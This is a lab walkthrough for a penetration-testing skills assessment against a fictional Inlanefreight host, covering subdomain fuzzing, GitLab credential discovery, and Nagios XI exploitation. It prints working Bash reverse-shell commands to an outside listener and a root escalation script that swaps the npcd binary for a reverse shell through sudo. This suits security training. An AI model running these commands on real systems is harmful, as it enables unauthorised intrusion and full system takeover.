Attacking Common Applications - Skills Assessment II

During an external penetration test for the company Inlanefreight, you come across a host that, at first glance, does not seem extremely interesting. At this point in the assessment, you have exhausted all options and hit several dead ends. Looking back through your enumeration notes, something catches your eye about this particular host. You also see a note that you don't recall about the gitlab.inlanefreight.local vhost.

Performing deeper and iterative enumeration reveals several serious flaws. Enumerate the target carefully and answer all the questions below to complete the second part of the skills assessment.

What is the URL of the WordPress instance?

We have two options here: we can fuzz to determine the complete URL of WordPress or just use enumeration using curl commands. You can inspect the source code using developer mode on browsers.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.local/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://FUZZ.inlanefreight.local/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

blog                    [Status: 200, Size: 50114, Words: 16140, Lines: 1015, Duration: 212ms]

using curl command

curl -s http://10.129.201.90/ |grep .local
                                            <li><a href="http://blog.inlanefreight.local/">Employee Blog</a></li>

What is the name of the public GitLab project?

#check /explore path

What is the FQDN of the third vhost?

you will find it in the previous path

What application is running on this third vhost? (One word)

The name of the logo on the login page.

What is the admin password to access this application?

Register an account on GitLab and then check Repository.

Obtain reverse shell access on the target and submit the contents of the flag.txt file.

After logging in to get shell access we need to go to 'core config manager' and then create a command to set up a Bash reverse shell.

bash -c 'bash -i >& /dev/tcp/10.10.16.78/4444 0>&1'

After saving it we need to create a service and set our created command then click Run check command or Run. However after that you need first to start your listener with nc on the same port as the Bash reverse shell.

starting listener

nc -lnvp 4444       
listening on [any] 4444 ...
connect to [10.10.16.78] from (UNKNOWN) [10.129.15.254] 57396
bash: cannot set terminal process group (5790): Inappropriate ioctl for device
bash: no job control in this shell
nagios@skills2:~$ ls

So now we need to privilege escalate to root. To begin hunting for root access

nagios@skills2:/$ sudo -l
sudo -l
Matching Defaults entries for nagios on skills2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nagios may run the following commands on skills2:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php
        /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

So we can privilege escalate by exploiting the Nagios service i use this script but you can also do it manually.

#!/bin/bash

# Create npcd script
echo "#!/bin/bash" > /tmp/npcd
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.78/4445 0>&1'" >> /tmp/npcd

# Grant executable permissions on the npcd script
chmod +x /tmp/npcd 2>/dev/null

# Stop the npcd service
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd

# Replace original npcd script
cp /tmp/npcd /usr/local/nagios/bin/npcd 2>/dev/null

echo "[+] Start Up your listener"
sleep 1
echo "[+] nc -lvnp 4445"

sleep 15

echo "[+] Expect your shell noobies"

# start service to recieve reverse shell
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

sleep 5

echo "[+] nice job hacker"

And starting our listener using the same port as in the script.

nc -lnvp 4445        
listening on [any] 4445 ...
connect to [10.10.16.78] from (UNKNOWN) [10.129.15.254] 37662
bash: cannot set terminal process group (7048): Inappropriate ioctl for device
bash: no job control in this shell
root@skills2:/# ls

So to find the flag i run this command

find / -name *flag* 2>/dev/null | grep txt
PreviousAttacking Common Applications - Skills Assessment INextAttacking Common Applications - Skills Assessment III

Last updated

Was this helpful?